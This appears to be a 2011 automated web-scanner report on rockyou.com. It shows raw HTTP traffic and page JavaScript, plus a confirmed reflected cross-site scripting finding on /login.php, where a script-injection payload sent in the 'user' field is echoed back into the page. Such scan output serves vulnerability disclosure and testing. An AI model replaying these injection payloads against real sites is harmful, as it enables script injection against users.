function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSectionsNew();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = []; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } setDefaultPublishSize(3); if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?'"--></style></script><script>netsparker(0x000E47)</script>&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noS..
Date: Mon, 18 Apr 2011 22:09:40 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:09:39 GMT; path=/; domain=.rockyou.com,lastlogin=1303164580; expires=Wed, 27-Jul-2011 22:09:40 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:09:40 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=26673 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26870
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSectionsNew();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = []; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } setDefaultPublishSize(3); if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?'"--></style></script><script>netsparker(0x000E47)</script>&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noS..
|
- /login.php
/login.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| lang | GET | en |
| pass | POST | 3 |
| user | POST | '"--></style></script><script>alert(0x000E4B)</script> |
| mode | POST | create |
| source | POST | 3 |
| flixster | POST | 3 |
| toscheck | POST | 1 |
| birthyear | POST | 3 |
| sex | POST | 3 |
| country | POST | 0 |
| postalcode | POST | 3 |
Request
POST /login.php?lang=en HTTP/1.1
Referer: http://www.rockyou.com/login.php?lang=en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164582; ctid=2; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 181
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
pass=3&user='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000E4B)%3c%2fscript%3e&mode=create&source=3&flixster=3&toscheck=1&birthyear=3&sex=3&country=0&postalcode=3
Referer: http://www.rockyou.com/login.php?lang=en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164582; ctid=2; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 181
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
pass=3&user='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000E4B)%3c%2fscript%3e&mode=create&source=3&flixster=3&toscheck=1&birthyear=3&sex=3&country=0&postalcode=3
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:09:42 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:09:41 GMT; path=/; domain=.rockyou.com,lastlogin=1303164582; expires=Wed, 27-Jul-2011 22:09:42 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:09:42 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=91513 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9072
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
